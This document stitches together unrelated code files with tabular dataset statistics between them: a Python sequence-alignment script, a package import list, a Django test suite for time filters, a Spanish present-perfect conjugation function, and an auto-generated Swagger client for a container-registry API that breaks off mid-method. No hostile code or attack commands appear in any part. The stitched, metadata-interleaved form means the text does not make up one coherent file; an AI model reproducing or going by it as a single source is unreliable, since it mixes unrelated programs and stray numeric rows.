                "h" if it is the horizontal (column) one.
    res       : output list; each finished alignment string is appended.
    string    : alignment built so far, in reverse ("—" marks a gap).
    flag_h / flag_v : True while extending an affine horizontal / vertical
                gap; only gap-continuation moves are then followed.

    Returns res.
    """
    lastResLst=directions[i][j]
    # An empty direction list means the matrix border was reached:
    # flush the remaining prefix of the sequence and record the result.
    if len(lastResLst)==0:
        for index in range(idx,-1,-1):
            string+=sequence[index]
        res.append(string[::-1])
    if flag_h==False and flag_v==False:
        # Not currently inside a gap: any recorded move may be followed.
        for item in lastResLst:
            if item=="\\":
                # Diagonal: consume one character of this sequence.
                string+=sequence[idx]
                printRes(i-1,j-1,directions,sequence,idx-1,orient,res,string)
            elif item=="|":
                # Vertical gap open: consumes a row character, so the
                # vertical sequence advances while the horizontal one gets "—".
                if orient=="v":
                    string+=sequence[idx]
                    printRes(i-1,j,directions,sequence,idx-1,orient,res,string)
                elif orient=="h":
                    string+="—"
                    printRes(i-1,j,directions,sequence,idx,orient,res,string)
            elif item=="—":
                # Horizontal gap open: mirror image of the "|" case.
                if orient=="v":
                    string+="—"
                    printRes(i,j-1,directions,sequence,idx,orient,res,string)
                elif orient=="h":
                    string+=sequence[idx]
                    printRes(i,j-1,directions,sequence,idx-1,orient,res,string)
            elif item=="(—)":
                # Horizontal gap continuation: stay in gap mode (flag_h=True).
                if orient=="v":
                    string+="—"
                    printRes(i,j-1,directions,sequence,idx,orient,res,string,True,False)
                elif orient=="h":
                    string+=sequence[idx]
                    printRes(i,j-1,directions,sequence,idx-1,orient,res,string,True,False)
            elif item=="(|)":
                # Vertical gap continuation: stay in gap mode (flag_v=True).
                if orient=="v":
                    string+=sequence[idx]
                    printRes(i-1,j,directions,sequence,idx-1,orient,res,string,False,True)
                elif orient=="h":
                    string+="—"
                    printRes(i-1,j,directions,sequence,idx,orient,res,string,False,True)
            # Undo this branch's appended character before trying the next move.
            string=string[:-1]
    elif flag_h==True and flag_v==False:
        # Extending a horizontal gap: only "—" / "(—)" moves are legal.
        for item in lastResLst:
            if item=="—":
                if orient=="v":
                    string+="—"
                    printRes(i,j-1,directions,sequence,idx,orient,res,string)
                elif orient=="h":
                    string+=sequence[idx]
                    printRes(i,j-1,directions,sequence,idx-1,orient,res,string)
            elif item=="(—)":
                if orient=="v":
                    string+="—"
                    printRes(i,j-1,directions,sequence,idx,orient,res,string,True,False)
                elif orient=="h":
                    string+=sequence[idx]
                    printRes(i,j-1,directions,sequence,idx-1,orient,res,string,True,False)
    elif flag_h==False and flag_v==True:
        # Extending a vertical gap: only "|" / "(|)" moves are legal.
        for item in lastResLst:
            if item=="|":
                if orient=="v":
                    string+=sequence[idx]
                    printRes(i-1,j,directions,sequence,idx-1,orient,res,string)
                elif orient=="h":
                    string+="—"
                    printRes(i-1,j,directions,sequence,idx,orient,res,string)
            elif item=="(|)":
                if orient=="v":
                    string+=sequence[idx]
                    printRes(i-1,j,directions,sequence,idx-1,orient,res,string,False,True)
                elif orient=="h":
                    string+="—"
                    printRes(i-1,j,directions,sequence,idx,orient,res,string,False,True)
    else:
        # Both flags set at once cannot happen by construction.
        print("this is impossible!")
    return(res)
def global_alignment():
    """Interactive driver: read two sequences from stdin, score them with
    global_score(), optionally display the score/direction matrices, and
    print one user-chosen optimal global alignment with match bars.
    """
    str1=input("plz enter the first sequence").upper()
    str2=input("plz enter the second sequence").upper()
    arr,directions=global_score(str1,str2)
    flag1=input("Do u want to show the score Mat? yes/no")
    if flag1=="yes":
        print(arr)
    flag1=input("Do u want to show the direction Mat? yes/no")
    if flag1=="yes":
        printDirections(directions)
    # Trace back from the bottom-right cell (-1, -1), once per sequence.
    str1_res=printRes(-1,-1,directions,str1,len(str1)-1,"v",[])
    str2_res=printRes(-1,-1,directions,str2,len(str2)-1,"h",[])
    num=len(str1_res)
    print("we have "+str(num)+" ans")
    idx=int(input("please choose which one?"))  # 1-based choice
    # Left-pad both rows to a common width so the bars line up.
    str1_fix=("%"+str(max(len(str1_res[idx-1]),len(str2_res[idx-1])))+"s") % (str1_res[idx-1])
    str2_fix=("%"+str(max(len(str1_res[idx-1]),len(str2_res[idx-1])))+"s") % (str2_res[idx-1])
    # Middle line: "|" wherever both rows hold a residue (not a gap/pad).
    inter_line=""
    for i,j in zip(str1_fix,str2_fix):
        if i!=" " and i!="—" and j!=" " and j!="—":
            inter_line+="|"
        else:
            inter_line+=" "
    flag1=input("Do u want to show the alignment result?")
    if flag1=="yes":
        print(str1_fix)
        print(inter_line)
        print(str2_fix)
# Single answer: the local-alignment version below reports only one optimal alignment.
import numpy as np
def local_score(str1,str2):
    """Fill a Smith-Waterman-style scoring matrix for locally aligning
    str1 (rows) against str2 (columns).

    Same scoring as global_score() (match +1, mismatch -1, gap open -2,
    extension -1) except that scores are clamped at 0 and the border is
    all zeros, which is what makes the alignment local.

    Returns (score matrix as nested lists, directions) — note: a plain
    list of lists here, unlike global_score() which wraps in numpy.
    """
    n=len(str1)
    m=len(str2)
    arr=[[None]*(m+1) for i in range(n+1)]
    # gaps_i / gaps_j: best path into a cell ends in a vertical / horizontal gap.
    gaps_i=[[False]*(m+1) for i in range(n+1)]
    gaps_j=[[False]*(m+1) for i in range(n+1)]
    directions=[[[] for j in range(m+1)] for i in range(n+1)]
    # Local alignment: border cells cost nothing.
    for i in range(m+1):
        arr[0][i]=0
    for i in range(n+1):
        arr[i][0]=0
    for i in range(1,n+1):
        for j in range(1,m+1):
            score=-float("inf")
            # Diagonal move: match (+1) or mismatch (-1).
            if str1[i-1]==str2[j-1] and arr[i-1][j-1]+1>score:
                score=arr[i-1][j-1]+1
            if str1[i-1]!=str2[j-1] and arr[i-1][j-1]-1>score:
                score=arr[i-1][j-1]-1
            # Gap open (-2) and gap extension (-1) moves.
            if arr[i-1][j]-2>score:
                score=arr[i-1][j]-2
            if arr[i][j-1]-2>score:
                score=arr[i][j-1]-2
            if gaps_i[i-1][j]==True and arr[i-1][j]-1>score:
                score=arr[i-1][j]-1
            if gaps_j[i][j-1]==True and arr[i][j-1]-1>score:
                score=arr[i][j-1]-1
            # Clamp at zero — negative-scoring local alignments are discarded.
            score=max(score,0)
            # Record every move that attains the (clamped) optimum.
            if score==arr[i-1][j]-2:
                gaps_i[i][j]=True
            if score==arr[i][j-1]-2:
                gaps_j[i][j]=True
            if gaps_i[i-1][j]==True and arr[i-1][j]-1==score:
                gaps_i[i][j]=True
            if gaps_j[i][j-1]==True and arr[i][j-1]-1==score:
                gaps_j[i][j]=True
            if str1[i-1]==str2[j-1] and arr[i-1][j-1]+1==score:
                directions[i][j].append("\\")
            if str1[i-1]!=str2[j-1] and arr[i-1][j-1]-1==score:
                directions[i][j].append("\\")
            if gaps_i[i][j]==True and gaps_i[i-1][j]==True:
                directions[i][j].append("(|)")
            if gaps_j[i][j]==True and gaps_j[i][j-1]==True:
                directions[i][j].append("(—)")
            if gaps_i[i][j]==True and gaps_i[i-1][j]==False:
                directions[i][j].append("|")
            if gaps_j[i][j]==True and gaps_j[i][j-1]==False:
                directions[i][j].append("—")
            arr[i][j]=score
    return(arr,directions)
def printMat(arr):
    """Display the matrix, one row per output line."""
    for row_index in range(len(arr)):
        row = arr[row_index]
        print(row)
def printRes4Local(i,j,arr,directions,sequence,idx,orient,res,string="",flag_h=False,flag_v=False):
    """Local-alignment counterpart of printRes(): trace back from cell
    (i, j) until a zero-scoring cell is reached (the Smith-Waterman stop
    condition), appending to `res` the aligned substring followed by the
    index in `sequence` where the local alignment starts.

    arr       : score matrix from local_score() (stop where arr[i][j]==0).
    orient    : "v" if `sequence` is the vertical sequence, "h" otherwise.
    flag_h / flag_v : True while extending an affine horizontal / vertical
                gap; only the matching continuation moves are followed.

    Returns res (pairs of [aligned string, start index] appended in order).
    """
    lastResLst=directions[i][j]
    # A zero cell ends the local alignment: record the string (reversed back
    # to forward order) and the position where the alignment begins.
    if arr[i][j]==0:
        res.append(string[::-1])
        res.append(idx)
    if flag_h==False and flag_v==False:
        # Not inside a gap: every recorded move may be followed.
        for item in lastResLst:
            if item=="\\":
                # Diagonal: consume one character of this sequence.
                string+=sequence[idx]
                printRes4Local(i-1,j-1,arr,directions,sequence,idx-1,orient,res,string)
            elif item=="|":
                # Vertical gap open.
                if orient=="v":
                    string+=sequence[idx]
                    printRes4Local(i-1,j,arr,directions,sequence,idx-1,orient,res,string)
                elif orient=="h":
                    string+="—"
                    printRes4Local(i-1,j,arr,directions,sequence,idx,orient,res,string)
            elif item=="—":
                # Horizontal gap open.
                if orient=="v":
                    string+="—"
                    printRes4Local(i,j-1,arr,directions,sequence,idx,orient,res,string)
                elif orient=="h":
                    string+=sequence[idx]
                    printRes4Local(i,j-1,arr,directions,sequence,idx-1,orient,res,string)
            elif item=="(—)":
                # Horizontal gap continuation (sets flag_h for the callee).
                if orient=="v":
                    string+="—"
                    printRes4Local(i,j-1,arr,directions,sequence,idx,orient,res,string,True,False)
                elif orient=="h":
                    string+=sequence[idx]
                    printRes4Local(i,j-1,arr,directions,sequence,idx-1,orient,res,string,True,False)
            elif item=="(|)":
                # Vertical gap continuation (sets flag_v for the callee).
                if orient=="v":
                    string+=sequence[idx]
                    printRes4Local(i-1,j,arr,directions,sequence,idx-1,orient,res,string,False,True)
                elif orient=="h":
                    string+="—"
                    printRes4Local(i-1,j,arr,directions,sequence,idx,orient,res,string,False,True)
            # Undo this branch's appended character before the next move.
            string=string[:-1]
    elif flag_h==True and flag_v==False:
        # Extending a horizontal gap: only "—" / "(—)" moves are legal.
        for item in lastResLst:
            if item=="—":
                if orient=="v":
                    string+="—"
                    printRes4Local(i,j-1,arr,directions,sequence,idx,orient,res,string)
                elif orient=="h":
                    string+=sequence[idx]
                    printRes4Local(i,j-1,arr,directions,sequence,idx-1,orient,res,string)
            elif item=="(—)":
                if orient=="v":
                    string+="—"
                    printRes4Local(i,j-1,arr,directions,sequence,idx,orient,res,string,True,False)
                elif orient=="h":
                    string+=sequence[idx]
                    printRes4Local(i,j-1,arr,directions,sequence,idx-1,orient,res,string,True,False)
    elif flag_h==False and flag_v==True:
        # Extending a vertical gap: only "|" / "(|)" moves are legal.
        for item in lastResLst:
            if item=="|":
                if orient=="v":
                    string+=sequence[idx]
                    printRes4Local(i-1,j,arr,directions,sequence,idx-1,orient,res,string)
                elif orient=="h":
                    string+="—"
                    printRes4Local(i-1,j,arr,directions,sequence,idx,orient,res,string)
            elif item=="(|)":
                if orient=="v":
                    string+=sequence[idx]
                    printRes4Local(i-1,j,arr,directions,sequence,idx-1,orient,res,string,False,True)
                elif orient=="h":
                    string+="—"
                    printRes4Local(i-1,j,arr,directions,sequence,idx,orient,res,string,False,True)
    else:
        # Both flags set simultaneously cannot happen by construction.
        print("this is impossible!")
    return(res)
def local_alignment():
    """Interactive driver for local (Smith-Waterman-style) alignment:
    reads two sequences, finds the highest-scoring cell, traces back one
    local alignment and prints it embedded in its full-sequence context.
    """
    str1=input("plz enter the first sequence").upper()
    str2=input("plz enter the second sequence").upper()
    arr,directions=local_score(str1,str2)
    flag1=input("Do u want to show the score Mat? yes/no")
    if flag1=="yes":
        print(np.array(arr))
    flag1=input("Do u want to show the direction Mat? yes/no")
    if flag1=="yes":
        printDirections(directions)
    # Locate the maximum-scoring cell — the traceback starting point.
    maxNum=0
    i_idx=0
    j_idx=0
    for i in range(len(arr)):
        if max(arr[i])>maxNum:
            maxNum=max(arr[i])
            i_idx=i
            j_idx=arr[i].index(max(arr[i]))
    # printRes4Local appends [aligned substring, start index] per sequence.
    str1Local=printRes4Local(i_idx,j_idx,arr,directions,str1,i_idx-1,"v",[])
    str2Local=printRes4Local(i_idx,j_idx,arr,directions,str2,j_idx-1,"h",[])
    seq1=str1Local[0]
    seq2=str2Local[0]
    # Middle line: "|" wherever neither row holds a gap.
    inter_line=""
    for x,y in zip(seq1,seq2):
        if x!="—" and y!="—":
            inter_line+="|"
        else:
            inter_line+=" "
    # Re-attach the unaligned prefixes/suffixes so the local match is shown
    # in the context of the complete sequences, padded to line up.
    site1=str1Local[1]
    site2=str2Local[1]
    addLeft1=str1[:site1+1]
    addLeft2=str2[:site2+1]
    if site1>=site2:
        addLeft2=" "*(site1-site2)+addLeft2
        inter_line=" "*(site1+1)+inter_line
    else:
        addLeft1=" "*(site2-site1)+addLeft1
        inter_line=" "*(site2+1)+inter_line
    addRight1=str1[(i_idx):]
    addRight2=str2[(j_idx):]
    addRight1L=len(addRight1)
    addRight2L=len(addRight2)
    if addRight1L>=addRight2L:
        addRight2+=" "*(addRight1L-addRight2L)
    else:
        addRight1+=" "*(addRight2L-addRight1L)
    seq1=addLeft1+seq1+addRight1
    seq2=addLeft2+seq2+addRight2
    flag1=input("Do u want to show the alignment result?")
    if flag1=="yes":
        print(seq1)
        print(inter_line)
        print(seq2)
| 39.040921
| 100
| 0.504487
| 2,196
| 15,265
| 3.477231
| 0.053279
| 0.019906
| 0.020822
| 0.021215
| 0.819277
| 0.796883
| 0.787978
| 0.774882
| 0.772394
| 0.772394
| 0
| 0.041574
| 0.324009
| 15,265
| 390
| 101
| 39.141026
| 0.695319
| 0.002227
| 0
| 0.745358
| 0
| 0
| 0.04
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.005305
| null | null | 0.180371
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
768f354173751e7640a0be05fde7bfa220cf4077
| 113
|
py
|
Python
|
models/__init__.py
|
ByungKwanLee/Masking-Adversarial-Damage
|
30c39f889b320e26685aab418e7e6b2cc1d12e93
|
[
"MIT"
] | 3
|
2022-03-11T10:29:20.000Z
|
2022-03-13T07:31:31.000Z
|
models/__init__.py
|
ByungKwanLee/Masking-Adversarial-Damage
|
30c39f889b320e26685aab418e7e6b2cc1d12e93
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
ByungKwanLee/Masking-Adversarial-Damage
|
30c39f889b320e26685aab418e7e6b2cc1d12e93
|
[
"MIT"
] | null | null | null |
from .vgg import *
from .resnet import *
from .wide import *
from .vgg_mask import *
from .resnet_mask import *
| 16.142857
| 26
| 0.725664
| 17
| 113
| 4.705882
| 0.352941
| 0.5
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.185841
| 113
| 6
| 27
| 18.833333
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
76b923efbdf9e4d7e4dfbaeca356da8636405366
| 4,251
|
py
|
Python
|
tests/filters/test_time_filters.py
|
Bilonan/django-binder
|
d2d9b504a92029a0afc616be81a08f0deddd5b64
|
[
"MIT"
] | 14
|
2016-08-15T13:08:55.000Z
|
2021-11-17T11:43:20.000Z
|
tests/filters/test_time_filters.py
|
Bilonan/django-binder
|
d2d9b504a92029a0afc616be81a08f0deddd5b64
|
[
"MIT"
] | 141
|
2016-08-14T15:36:35.000Z
|
2022-02-17T08:53:52.000Z
|
tests/filters/test_time_filters.py
|
Bilonan/django-binder
|
d2d9b504a92029a0afc616be81a08f0deddd5b64
|
[
"MIT"
] | 18
|
2016-10-01T21:30:22.000Z
|
2022-03-28T10:51:41.000Z
|
from django.test import TestCase, Client
from binder.json import jsonloads
from django.contrib.auth.models import User
from ..testapp.models import Zoo
import os
# NOTE(review): this comment arrived truncated ("This is not possible in");
# judging from the guard below, time filtering is presumably not supported
# when testing against MySQL — confirm against project docs.
if os.environ.get('BINDER_TEST_MYSQL', '0') != '1':
    class TimeFiltersTest(TestCase):
        """Filtering on the time-typed `opening_time` field of Zoo."""
        def setUp(self):
            # Create and log in a superuser, then two zoos with known opening times.
            super().setUp()
            u = User(username='testuser', is_active=True, is_superuser=True)
            u.set_password('test')
            u.save()
            self.client = Client()
            r = self.client.login(username='testuser', password='test')
            self.assertTrue(r)
            Zoo(name='Burgers Zoo', opening_time='11:00:00Z').save()
            Zoo(name='Artis', opening_time='09:00:00Z').save()
        def test_time_filter_exact_match(self):
            # Several equivalent spellings of the same time must all match.
            response = self.client.get('/zoo/', data={'.opening_time': '09:00:00Z'})
            self.assertEqual(response.status_code, 200)
            result = jsonloads(response.content)
            self.assertEqual(1, len(result['data']))
            self.assertEqual('Artis', result['data'][0]['name'])
            response = self.client.get('/zoo/', data={'.opening_time': '11:00:00Z'})
            result = jsonloads(response.content)
            self.assertEqual(1, len(result['data']))
            self.assertEqual('Burgers Zoo', result['data'][0]['name'])
            # Fractional seconds and explicit UTC offsets are accepted too.
            response = self.client.get('/zoo/', data={'.opening_time': '09:00:00.000+00:00'})
            self.assertEqual(response.status_code, 200)
            result = jsonloads(response.content)
            self.assertEqual(1, len(result['data']))
            self.assertEqual('Artis', result['data'][0]['name'])
            response = self.client.get('/zoo/', data={'.opening_time': '11:00:00.000000+0000'})
            result = jsonloads(response.content)
            self.assertEqual(1, len(result['data']))
            self.assertEqual('Burgers Zoo', result['data'][0]['name'])
        def test_time_filter_gte_match(self):
            # gte includes the boundary value itself.
            response = self.client.get('/zoo/', data={'.opening_time:gte': '09:00:00Z', 'order_by': 'opening_time'})
            self.assertEqual(response.status_code, 200)
            result = jsonloads(response.content)
            self.assertEqual(2, len(result['data']))
            self.assertEqual('Artis', result['data'][0]['name'])
            self.assertEqual('Burgers Zoo', result['data'][1]['name'])
            response = self.client.get('/zoo/', data={'.opening_time:gte': '10:00:00Z', 'order_by': 'opening_time'})
            self.assertEqual(response.status_code, 200)
            result = jsonloads(response.content)
            self.assertEqual(1, len(result['data']))
            self.assertEqual('Burgers Zoo', result['data'][0]['name'])
            response = self.client.get('/zoo/', data={'.opening_time:gte': '12:00:00Z', 'order_by': 'opening_time'})
            self.assertEqual(response.status_code, 200)
            result = jsonloads(response.content)
            self.assertEqual(0, len(result['data']))
        def test_time_filter_gt_match(self):
            # gt excludes the boundary value (09:00 drops Artis).
            response = self.client.get('/zoo/', data={'.opening_time:gt': '08:00:00Z', 'order_by': 'opening_time'})
            self.assertEqual(response.status_code, 200)
            result = jsonloads(response.content)
            self.assertEqual(2, len(result['data']))
            self.assertEqual('Artis', result['data'][0]['name'])
            self.assertEqual('Burgers Zoo', result['data'][1]['name'])
            response = self.client.get('/zoo/', data={'.opening_time:gt': '09:00:00Z', 'order_by': 'opening_time'})
            self.assertEqual(response.status_code, 200)
            result = jsonloads(response.content)
            self.assertEqual(1, len(result['data']))
            self.assertEqual('Burgers Zoo', result['data'][0]['name'])
            response = self.client.get('/zoo/', data={'.opening_time:gt': '12:00:00Z', 'order_by': 'opening_time'})
            self.assertEqual(response.status_code, 200)
            result = jsonloads(response.content)
            self.assertEqual(0, len(result['data']))
        # NOTE(review): missing the `test_` prefix, so the test runner never
        # executes this — presumably a typo for test_time_filter_overnight_range.
        def time_time_filter_overnight_range(self):
            # A range that wraps past midnight (22:00 -> 10:00).
            response = self.client.get('/zoo/', data={'.opening_time:range': '22:00:00Z,10:00:00Z', 'order_by': 'opening_time'})
            self.assertEqual(response.status_code, 200)
            result = jsonloads(response.content)
            self.assertEqual(1, len(result['data']))
            self.assertEqual('Artis', result['data'][0]['name'])
        def test_time_filter_syntax_errors_cause_error_response(self):
            # A date where a time is expected, and a malformed offset, both 418.
            response = self.client.get('/zoo/', data={'.opening_time': '1838-05-01'})
            self.assertEqual(response.status_code, 418)
            response = self.client.get('/zoo/', data={'.opening_time': '09:00:00Z-02'})
            self.assertEqual(response.status_code, 418)
| 35.722689
| 119
| 0.687368
| 580
| 4,251
| 4.92069
| 0.153448
| 0.173441
| 0.08199
| 0.095655
| 0.804135
| 0.79047
| 0.765242
| 0.765242
| 0.753329
| 0.721444
| 0
| 0.046363
| 0.117149
| 4,251
| 118
| 120
| 36.025424
| 0.714095
| 0.00541
| 0
| 0.556962
| 0
| 0
| 0.201609
| 0
| 0
| 0
| 0
| 0
| 0.43038
| 1
| 0.075949
| false
| 0.025316
| 0.063291
| 0
| 0.151899
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
76c64ea5bb6aa25837d19b201f8df60787c85552
| 1,804
|
py
|
Python
|
src/spanishconjugator/tenses/indicative/present_perfect.py
|
shrutiichandra/spanish-conjugator
|
2ebf41b92c14c3e47a873c52fdf4ce1d17bff5e0
|
[
"MIT"
] | null | null | null |
src/spanishconjugator/tenses/indicative/present_perfect.py
|
shrutiichandra/spanish-conjugator
|
2ebf41b92c14c3e47a873c52fdf4ce1d17bff5e0
|
[
"MIT"
] | null | null | null |
src/spanishconjugator/tenses/indicative/present_perfect.py
|
shrutiichandra/spanish-conjugator
|
2ebf41b92c14c3e47a873c52fdf4ce1d17bff5e0
|
[
"MIT"
] | null | null | null |
# -*- coding: iso-8859-15 -*-
def indicative_present_perfect(root_verb, pronoun):
    """Conjugate *root_verb* (an infinitive ending in -ar/-er/-ir) in the
    Spanish indicative present perfect for *pronoun*.

    Returns "<auxiliary haber> <past participle>", e.g.
    ("hablar", "yo") -> "he hablado".  Returns None for an unrecognized
    pronoun, matching the original implicit fall-through.
    """
    # Present-tense forms of the auxiliary "haber", keyed by pronoun.
    auxiliaries = {
        "yo": "he",
        "tu": "has",
        "usted": "ha",
        "nosotros": "hemos",
        "vosotros": "habéis",
        "ustedes": "han",
    }
    auxiliary = auxiliaries.get(pronoun)
    if auxiliary is None:
        return None
    # BUG FIX: the original tested `root_verb[-2:] == "er" or "ir"`, which is
    # always true because the non-empty string "ir" is truthy.  For -er/-ir
    # verbs the outcome happened to be correct, so observable behavior for
    # regular verbs is preserved; the condition is now written explicitly.
    stem, ending = root_verb[:-2], root_verb[-2:]
    participle = stem + ("ado" if ending == "ar" else "ido")
    return auxiliary + " " + participle
| 36.816327
| 51
| 0.48337
| 197
| 1,804
| 4.28934
| 0.167513
| 0.236686
| 0.255621
| 0.156213
| 0.702959
| 0.702959
| 0.702959
| 0.702959
| 0.702959
| 0.702959
| 0
| 0.025685
| 0.35255
| 1,804
| 49
| 52
| 36.816327
| 0.697774
| 0.014967
| 0
| 0.837209
| 0
| 0
| 0.088964
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0
| 0
| 0.302326
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4f0ff69d912dc06dc10ed5ea5064d54c9a6ca17d
| 34,664
|
py
|
Python
|
layint_api/apis/registry_api.py
|
LayeredInsight/layint_api_python
|
a5c9a5b24098bd823c5102b7ab9e4745432f19b4
|
[
"Apache-2.0"
] | null | null | null |
layint_api/apis/registry_api.py
|
LayeredInsight/layint_api_python
|
a5c9a5b24098bd823c5102b7ab9e4745432f19b4
|
[
"Apache-2.0"
] | null | null | null |
layint_api/apis/registry_api.py
|
LayeredInsight/layint_api_python
|
a5c9a5b24098bd823c5102b7ab9e4745432f19b4
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Layered Insight Assessment, Compliance, Witness & Control
LI Assessment & Compliance performs static vulnerability analysis, license and package compliance. LI Witness provides deep insight and analytics into containerized applications. Control provides dynamic runtime security and analytics for containerized applications. You can find out more about the Layered Insight Suite at [http://layeredinsight.com](http://layeredinsight.com).
OpenAPI spec version: 0.10
Contact: help@layeredinsight.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class RegistryApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
    def __init__(self, api_client=None):
        # Use the caller-supplied client if given; otherwise fall back to
        # (and lazily create) the shared client on the Configuration object.
        config = Configuration()
        if api_client:
            self.api_client = api_client
        else:
            if not config.api_client:
                config.api_client = ApiClient()
            self.api_client = config.api_client
def add_ecr_creds(self, ecr_credentials, **kwargs):
"""
Add credentials for AWS ECR
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_ecr_creds(ecr_credentials, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param EcrCredentials ecr_credentials: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_ecr_creds_with_http_info(ecr_credentials, **kwargs)
else:
(data) = self.add_ecr_creds_with_http_info(ecr_credentials, **kwargs)
return data
    def add_ecr_creds_with_http_info(self, ecr_credentials, **kwargs):
        """
        Add credentials for AWS ECR
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.add_ecr_creds_with_http_info(ecr_credentials, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param EcrCredentials ecr_credentials: (required)
        :return: None
            If the method is called asynchronously,
            returns the request thread.
        """
        # Reject keyword arguments this endpoint does not understand.
        all_params = ['ecr_credentials']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method add_ecr_creds" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'ecr_credentials' is set
        if ('ecr_credentials' not in params) or (params['ecr_credentials'] is None):
            raise ValueError("Missing the required parameter `ecr_credentials` when calling `add_ecr_creds`")
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        # The credentials object travels as the JSON request body.
        body_params = None
        if 'ecr_credentials' in params:
            body_params = params['ecr_credentials']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])
        # Authentication setting
        auth_settings = ['ApiKey']
        return self.api_client.call_api('/Scan/EcrCreds', 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
def add_registry(self, **kwargs):
"""
Create new registry definition
Creates a registry object which can then be used to specify where container images are stored. ID SHOULD NOT be passed when creating a new registry.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_registry(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Registry registry:
:return: Registry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_registry_with_http_info(**kwargs)
else:
(data) = self.add_registry_with_http_info(**kwargs)
return data
    def add_registry_with_http_info(self, **kwargs):
        """
        Create new registry definition
        Creates a registry object which can then be used to specify where container images are stored. ID SHOULD NOT be passed when creating a new registry.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.add_registry_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param Registry registry:
        :return: Registry
            If the method is called asynchronously,
            returns the request thread.
        """
        # Reject keyword arguments this endpoint does not understand.
        all_params = ['registry']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method add_registry" % key
                )
            params[key] = val
        del params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        # The optional registry object travels as the JSON request body.
        body_params = None
        if 'registry' in params:
            body_params = params['registry']
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])
        # Authentication setting
        auth_settings = ['ApiKey']
        return self.api_client.call_api('/Registries', 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='Registry',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
